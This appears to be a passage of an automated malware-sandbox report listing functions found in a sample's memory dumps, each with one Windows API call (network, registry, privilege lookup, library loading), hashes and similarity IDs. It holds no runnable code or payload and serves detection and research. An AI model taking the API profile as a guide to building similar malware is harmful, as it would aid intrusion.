Instruction ID: 8ed01b50dc1b291d104c09782c8fd9ea66f7de66a17e55abe15a557d6f5cc593
Opcode Fuzzy Hash: 5a1b36cbe0ffbaf196ecba4db468d07951f071d0842d19e73869fd72a2fb64cf
Instruction Fuzzy Hash: 6D11E671500204EFEB11DF65DC44F6BBBE8EF04710F14846AEE449B252D674E904CB72

Uniqueness

Uniqueness Score: -1.00%

Function 01351154, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 01351171

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: f3cf331743b9744635a496c5ad0d07c57b1b38f0f5ef6381c2fbeef9d7fd4920
Instruction ID: 8db9dbd9043264968127b880ed2e46193d7ec4cec884153bb3991f59f7c4466e
Opcode Fuzzy Hash: f3cf331743b9744635a496c5ad0d07c57b1b38f0f5ef6381c2fbeef9d7fd4920
Instruction Fuzzy Hash: 281159702003056FEB249F1CCDC0F8A3766EF56768F214365DD55872E1E775C882C621

Uniqueness

Uniqueness Score: -1.00%

Function 208C2D26, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2D8A

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 8539fa5e671470fa7bcc1175b2a72f3449d7dc994cfb0cd39e680dfbde29f0af
Instruction ID: 0ef41b2dfedbcaaa61afaed9618c0cd0a4806a733b19adfa80575b8cc7ac895e
Opcode Fuzzy Hash: 8539fa5e671470fa7bcc1175b2a72f3449d7dc994cfb0cd39e680dfbde29f0af
Instruction Fuzzy Hash: 53118271400208EFEB11DF65DC84FA7BBECEF44721F14846AEA45AB242D674E5048BB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB4A2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 1DECB4FE

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 5598f60f0a74cd45f7e59bc974b881b17d910d301aeba9e458946943c012464b
Instruction ID: c9facb0ea96b6b95c938ea562f5917b3aae71d5d59c1dc739dfc35ef20babaf6
Opcode Fuzzy Hash: 5598f60f0a74cd45f7e59bc974b881b17d910d301aeba9e458946943c012464b
Instruction Fuzzy Hash: 6711E271500204AFEB118F29DD44B67BBE8EF44721F14846AEE489B241D674A4048B72

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA836, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,F0CD05F7,00000000,?,?,?,?,?,?,?,?,72F33C38), ref: 1DECA8A8

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: d31453f68234a1e31658fa7ecc7aaf2ad1ac298b8c91b6c685485007a55a0651
Instruction ID: 42d82b0073bac6f8060957b4423a5a580c6f7d12d3eb63c3839674e6da04b2fc
Opcode Fuzzy Hash: d31453f68234a1e31658fa7ecc7aaf2ad1ac298b8c91b6c685485007a55a0651
Instruction Fuzzy Hash: 7C21897140E3C4AFD7138B259C94A62BFB4DF07624F0980DBED859F2A3D2695908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DECA7F6

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7c813a7618631b81447e543e3046e0a8c92f07321816d52807006b41ac2ff8de
Instruction ID: f72e187f7c0d705ee4834465d9d0852b9e6247865157bd7ab59b2ecb1ff42125
Opcode Fuzzy Hash: 7c813a7618631b81447e543e3046e0a8c92f07321816d52807006b41ac2ff8de
Instruction Fuzzy Hash: 6911B772409380AFDB228F54DC44B62FFF4EF46210F0885DAED858B153D235A418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 208C0E42, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C0EA1

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c96bd85aacf9d1986184001c96202c0d2330b11d255b622aed8066f438c3c564
Instruction ID: 9df218490bb046c339b42c8ebbe56cedc901ce2a1c5035c32359e2c7cea01ef2
Opcode Fuzzy Hash: c96bd85aacf9d1986184001c96202c0d2330b11d255b622aed8066f438c3c564
Instruction Fuzzy Hash: CF118271444204EFEB21DF95DC44F6BBBA8EF44310F14885AEA449B252D274A5058B71

Uniqueness

Uniqueness Score: -1.00%

Function 208C168D, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,F0CD05F7,00000000,?,?,?,?,?,?,?,?,72F33C38), ref: 208C16EC

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 69eed8f8098c3712adcf73da14c888ef7a18aeace2cab5665bb21b4553943020
Instruction ID: 4d90cf336f98bc03757ebe2ef97f9df577f07f667fe1f84890d3c34ba32d4a82
Opcode Fuzzy Hash: 69eed8f8098c3712adcf73da14c888ef7a18aeace2cab5665bb21b4553943020
Instruction Fuzzy Hash: BD118E715093849FDB168F65DC84B92BFF4EF47220F0984EADD858F263D274A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01352B81, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,0135303C,01351355,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01352A16

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e52214c18432a9d5478bd8599cdf4323df253e9e76c58a4075c0297a2fbd52c1
Instruction ID: fb60df6b0aecac1cd93916be3981d1d85c4e98fcd72ed344eae2ca383d942095
Opcode Fuzzy Hash: e52214c18432a9d5478bd8599cdf4323df253e9e76c58a4075c0297a2fbd52c1
Instruction Fuzzy Hash: 4E01FCB160024AFBDFB67F6C85D0FFF32AACF21E98FE18165FC4697105C62488948551

Uniqueness

Uniqueness Score: -1.00%

Function 208C2A6A, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2AC3

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 8ef54d0cd5a9d0e691db4b9d1efe62f1c8bda0bc0625ce24c839437c7ac3a41a
Instruction ID: 03158bb46f73dbdb774c33b574de5eca073f24a3cba6f6c6269e51dca19eb853
Opcode Fuzzy Hash: 8ef54d0cd5a9d0e691db4b9d1efe62f1c8bda0bc0625ce24c839437c7ac3a41a
Instruction Fuzzy Hash: 7B11A371400204EFEB21DF59DC84F67BBA8EF44720F1484AAEE449B282D274A904CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E1F09, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1D2E1F58

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 068775d7d54ff68b61c76188b911a77ad9714573c026c055952d012ebcc36ff5
Instruction ID: 271a812fc8616cc554bef0b2a2ba66146a00b2f7cb128ca461e72a69f8d8d638
Opcode Fuzzy Hash: 068775d7d54ff68b61c76188b911a77ad9714573c026c055952d012ebcc36ff5
Instruction Fuzzy Hash: 5B215E30D00259DFDB04DF78C894A9EFBB2FF85351F518529E916BB241DB35A981CB81

Uniqueness

Uniqueness Score: -1.00%

Function 208C2542, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2598

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: e67241230bd20f60316cfbc892b365e0e89528fe53072066380c4ce2070e43ba
Instruction ID: 633f72a1c8c2f416581ea3913a95341e8670478e1c7161346326987a10bb6edc
Opcode Fuzzy Hash: e67241230bd20f60316cfbc892b365e0e89528fe53072066380c4ce2070e43ba
Instruction Fuzzy Hash: 6B11E571404204EFEB11DF59DC84F6BBBE8EF44720F1484AAEE449B282D674E9058BB2

Uniqueness

Uniqueness Score: -1.00%

Function 208C2E0A, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2E69

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 88e9bca358a6bc2f41bd43a6f53b88d935b6bd8ef0892913aa1f4008ddb01015
Instruction ID: 6795ca13af97272303a8ec00ca0363ccafee202f97e4f77455a34c050859b8f5
Opcode Fuzzy Hash: 88e9bca358a6bc2f41bd43a6f53b88d935b6bd8ef0892913aa1f4008ddb01015
Instruction Fuzzy Hash: FD11C271400304EFEB219F55DC84FABFBA8EF04720F14845AEE446B292D274E509CB72

Uniqueness

Uniqueness Score: -1.00%

Function 208C0522, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 208C058B

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 59dfd5ad0640734afa1963016572bd266c2ab6f6f344cfc79cb9f24aac84db68
Instruction ID: e12968a7cc531e4d0994c5cc8569f66806ae4f7299a3869d234dc416324090c6
Opcode Fuzzy Hash: 59dfd5ad0640734afa1963016572bd266c2ab6f6f344cfc79cb9f24aac84db68
Instruction Fuzzy Hash: 2B11E571500304EFF7209B55DC41FA7BBA8DF05720F148099EE44AB282D2B5E909CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1DECA0D5

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 3db74976785661e50178ea1dde37bbf8e49ff95a59586642a341e082efbb0762
Instruction ID: f91cd2ed18a3f5dc769e6879fe35393959ac5fe4edf253596d0abcfcece083c9
Opcode Fuzzy Hash: 3db74976785661e50178ea1dde37bbf8e49ff95a59586642a341e082efbb0762
Instruction Fuzzy Hash: 73119171409384AFDB22CF15DD44B52FFB4EF45224F08849AED889F253D275A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA44B, Relevance: 1.6, APIs: 1, Instructions: 54comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 1DECA4AC

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3add7312b30d5c4dfd1bc91671c0fc41eaf597b412f9868392b442e0b1e17a84
Instruction ID: 31feba08356c29db9a6291153329f479c64b875ff137d96bb20f9c137b8fb1cf
Opcode Fuzzy Hash: 3add7312b30d5c4dfd1bc91671c0fc41eaf597b412f9868392b442e0b1e17a84
Instruction Fuzzy Hash: A911C1714493C4AFD712CF14DC48B52BFB4EF46225F0884DAED888F293D279A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 208C1906, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C195C

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: e7465470b97aa0bf35f373a99d9bb1f7ae7d0d083d212661b504f644a692477c
Instruction ID: 766059d74047050a0cd4fbc16473f3ade6bccbb6f75445d244b109da51908aeb
Opcode Fuzzy Hash: e7465470b97aa0bf35f373a99d9bb1f7ae7d0d083d212661b504f644a692477c
Instruction Fuzzy Hash: D301C471500204EEEB11CB59DC85F67FFA8EF45320F148096EE48AB242D274E509CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 1DECAD22, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1DECAD6A

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7593524081089a57d88e35d028994d62c967681ea0a2842da626566640d11bce
Instruction ID: 0f71d4e78c3f613264d7576c26919dc41812e7d9003444d03897fc3d31d06389
Opcode Fuzzy Hash: 7593524081089a57d88e35d028994d62c967681ea0a2842da626566640d11bce
Instruction Fuzzy Hash: 44118EB1A003419FDB51CF29DD84757FFE8EF44626F08C46ADD49DB242EA74E804CA62

Uniqueness

Uniqueness Score: -1.00%

Function 208C0D82, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C0DD5

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 1e7cdc86c3405c4db496db1219522f505047b0408924f723c9bb04a843b4e419
Instruction ID: d08c373d0b90c5d65ad5f523169a9cacd690e7e20d8f433b21fed16dad1d1d0d
Opcode Fuzzy Hash: 1e7cdc86c3405c4db496db1219522f505047b0408924f723c9bb04a843b4e419
Instruction Fuzzy Hash: B7019271504604EEE710DF59DC85FA7BBE8DF44721F24849AEE44AB242D678E9088AB2

Uniqueness

Uniqueness Score: -1.00%

Function 01352AEB, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,0135303C,01351355,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01352A16

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b8490da4acb90df60a450629ac05d6040070a24bb04c61be9e2dfc5ce26c573f
Instruction ID: 0c4cd22f8bef33e80af4b202f922db6e6eaf933310fb5e83a2f238c14ec02e78
Opcode Fuzzy Hash: b8490da4acb90df60a450629ac05d6040070a24bb04c61be9e2dfc5ce26c573f
Instruction Fuzzy Hash: 5E01F4B050025FFBDF623FA85864FFF366ADF11EA8FA08028FC5781145CA2484A88562

Uniqueness

Uniqueness Score: -1.00%

Function 208C2EDE, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 208C2F2A

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 1ad35340180c59ccc8a8bd5590ac02c89f4a930d40686018418a4446c2a7d8a6
Instruction ID: eceab8fc295ac9c5d10c6f047b23d24d58f6e95e7fae97b71573d6403bc919bb
Opcode Fuzzy Hash: 1ad35340180c59ccc8a8bd5590ac02c89f4a930d40686018418a4446c2a7d8a6
Instruction Fuzzy Hash: 75117071400608DFDB21CF95D884B56FBF4EF04710F0485AAEE498B262D775E918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA172, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000EB4,?,?), ref: 1DECA1C2

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: b2065d6a4b4056c362ad8286aa0a5075d04f227b8d8f691e6a4c66bf58811687
Instruction ID: 7761ba5533593f04e86851e3833feb632567ad5ecb6cb436634a7663866c6bd1
Opcode Fuzzy Hash: b2065d6a4b4056c362ad8286aa0a5075d04f227b8d8f691e6a4c66bf58811687
Instruction Fuzzy Hash: A601B171500200ABD710DF16DC81B26FBA8EB85A20F14816AED088B741E335F915CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB6AA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1DECB6FA

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 454f2e340492cb9d2f6e7d847edd949faef4e6913f960a785b47b086a7df5ad6
Instruction ID: 3c0169165ff511edd39829ab000cf8287c2ea4a4e952619dc2407407753f6812
Opcode Fuzzy Hash: 454f2e340492cb9d2f6e7d847edd949faef4e6913f960a785b47b086a7df5ad6
Instruction Fuzzy Hash: 6B01B172500200ABD710DF16DC81B26FBA8EB85A20F14816AED088B741E331F915CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA7B2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DECA7F6

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a9ca22adc919a0f545e2245af2c72ee3c8d466791d0017baf39990b18ef2df99
Instruction ID: 4ace39c7fc527844f9d53de882c02a6d5f0b8ace4062eec2c7e4437710084836
Opcode Fuzzy Hash: a9ca22adc919a0f545e2245af2c72ee3c8d466791d0017baf39990b18ef2df99
Instruction Fuzzy Hash: BB01AD32400640DFDB218F55D948B26FFE0EF08721F08C9AAEE494A612D335A419DF62

Uniqueness

Uniqueness Score: -1.00%

Function 208C16BA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,F0CD05F7,00000000,?,?,?,?,?,?,?,?,72F33C38), ref: 208C16EC

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 79b71fa27887922d35a15997ef5fb6e257c99c2e6a759c4641545f24902cb9f7
Instruction ID: c4326e5c74a14f830c536d1cbf4235ee06b8f783d237e284b4e9fd105d421c09
Opcode Fuzzy Hash: 79b71fa27887922d35a15997ef5fb6e257c99c2e6a759c4641545f24902cb9f7
Instruction Fuzzy Hash: 4B01DF74904204DFDF148F69E884B66FFE4DF11221F18C0AADD488B256D678E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 208C1BE2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 208C1C20

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 8933ff66bdf7b17c7794ab2b466f505f4595036917425b7ffc84877ec690e464
Instruction ID: d611cf4051201b08a862fef244ac13509446a9458ed79627f262662247e722ca
Opcode Fuzzy Hash: 8933ff66bdf7b17c7794ab2b466f505f4595036917425b7ffc84877ec690e464
Instruction Fuzzy Hash: F3019E71440204DFDF21CF95D884B66FFF0EF14320F1884AAEE484B212D275E518DB62

Uniqueness

Uniqueness Score: -1.00%

Function 208C1136, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EB4,?,?), ref: 208C1186

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 7c41ffe6ed8694b7fce6d9860e63f0fd14002b603f0cee6e03f12998d4f97ea1
Instruction ID: a07e4969cd35a5855dd3da762e73f425b6ebefbcdf6dc7f723b37145a3a481f2
Opcode Fuzzy Hash: 7c41ffe6ed8694b7fce6d9860e63f0fd14002b603f0cee6e03f12998d4f97ea1
Instruction Fuzzy Hash: 53016271500204ABD650DF16DC86B26FBE4FB89B20F14815AED085B741E371F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 1DECAB2E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1DECAB7E

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: a31989886f9061dff2231643be4072500947f914e07c48006046447cc874efe0
Instruction ID: b979731242c08268b2c82b1c25cce9dc4c690794b3341bd4a8dce9e7b0a74db0
Opcode Fuzzy Hash: a31989886f9061dff2231643be4072500947f914e07c48006046447cc874efe0
Instruction Fuzzy Hash: E201A272500200ABD250DF16DC82B26FBE4FB89B20F14816AED084B741E331F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB30E, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DECB35E

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2d784b784dd4344036c511909d7365207cd7a00b39a034a16cdc960e615be3e2
Instruction ID: 80ff5700ee200bab07831492b945685ab4d24d86db24ddb1c036a614bd34b02f
Opcode Fuzzy Hash: 2d784b784dd4344036c511909d7365207cd7a00b39a034a16cdc960e615be3e2
Instruction Fuzzy Hash: 7201A272500200ABD250DF16DC82B26FBE4FB89B20F14816AED084B741E371F915CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA47A, Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 1DECA4AC

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e4e9254de2c7dd890eefe33e30f7eb1311e2af32ebd14fafa2d254b3ac0af3c5
Instruction ID: aaa2012f8692e9567ff330c31709fff4a4525591dee9cea1c5475328768b7e4d
Opcode Fuzzy Hash: e4e9254de2c7dd890eefe33e30f7eb1311e2af32ebd14fafa2d254b3ac0af3c5
Instruction Fuzzy Hash: 7101AD70804244DFDB11CF19D988766FFE0EF44622F18C4AADE489F202D678A808CA62

Uniqueness

Uniqueness Score: -1.00%

Function 013529BA, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,0135303C,01351355,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01352A16

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fa42c039ed2e949dd153bea202f0c13e2a75c2ec906575770de89921d27dcaba
Instruction ID: 2f32c89470ce2ce1c933ab05cb9d2a31edb5361af1d2eea59bca641fd58b1736
Opcode Fuzzy Hash: fa42c039ed2e949dd153bea202f0c13e2a75c2ec906575770de89921d27dcaba
Instruction Fuzzy Hash: B7F0E5E091029FFAEFB63F6C5890FBF21A9CF10EACFA04139FC4381105CA18849941A2

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA876, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,F0CD05F7,00000000,?,?,?,?,?,?,?,?,72F33C38), ref: 1DECA8A8

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a88484d0ccc41e876c1c7a62163a79ffdd2e895c9b01974467171dfd93661e58
Instruction ID: 6a1ebb24f9307a29e8889f3affba630f225a2832b899a6b8924e639710e63c80
Opcode Fuzzy Hash: a88484d0ccc41e876c1c7a62163a79ffdd2e895c9b01974467171dfd93661e58
Instruction Fuzzy Hash: 5DF08C35904644DFDB218F09D988762FFA0EF04626F18C09ADE495B252D779A809CA62

Uniqueness

Uniqueness Score: -1.00%

Function 20EE3278, Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

:@9r, xrefs: 20EE3363

Memory Dump Source

Source File: 00000016.00000002.736513878.0000000020EE0000.00000040.00000001.sdmp, Offset: 20EE0000, based on PE: false

Similarity

API ID:
String ID: :@9r
API String ID: 0-2127026099
Opcode ID: 0644a9950e2eded06fc3f16fee1037630c7a58441135da62e0c66aef1af984d1
Instruction ID: 128e05f88072b4b816edad85061618ed59f21bbb38a330d65fb5528bda667be4
Opcode Fuzzy Hash: 0644a9950e2eded06fc3f16fee1037630c7a58441135da62e0c66aef1af984d1
Instruction Fuzzy Hash: CA71C630B000549BEF019BFDC498B5E7AE6EB8D325F50442AE10AD7392CE75CE859762

Uniqueness

Uniqueness Score: -1.00%

Function 20EE3288, Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

:@9r, xrefs: 20EE3363

Memory Dump Source

Source File: 00000016.00000002.736513878.0000000020EE0000.00000040.00000001.sdmp, Offset: 20EE0000, based on PE: false

Similarity

API ID:
String ID: :@9r
API String ID: 0-2127026099
Opcode ID: 830920dbab96a70bde8c2f45fe8e9929cf449e0f637f6acdf73ccdfa76bd6c83
Instruction ID: 52828a8da5a4c1cfae73153c68413cf7d46530468eb611ddd81a36d8319e158c
Opcode Fuzzy Hash: 830920dbab96a70bde8c2f45fe8e9929cf449e0f637f6acdf73ccdfa76bd6c83
Instruction Fuzzy Hash: 87719530B000549BEF15ABFDC498B5E7AE6EBCD325F50443AE11AC7392CE65CE819762

Uniqueness

Uniqueness Score: -1.00%

Function 20EE3920, Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736513878.0000000020EE0000.00000040.00000001.sdmp, Offset: 20EE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88dbad2865c64e584e760e016fef4dbbbb41912a71531623f44366284d613af3
Instruction ID: 725bee7cbd52a87a53bbb5a154d5b0377d1f8f9c9b3add22928cf763f583c2a6
Opcode Fuzzy Hash: 88dbad2865c64e584e760e016fef4dbbbb41912a71531623f44366284d613af3
Instruction Fuzzy Hash: 6EB1D135B002088FCB05AFB8C8986AD7BF2BFC9311F15806AE509AB365DF359C46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 20EE3749, Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

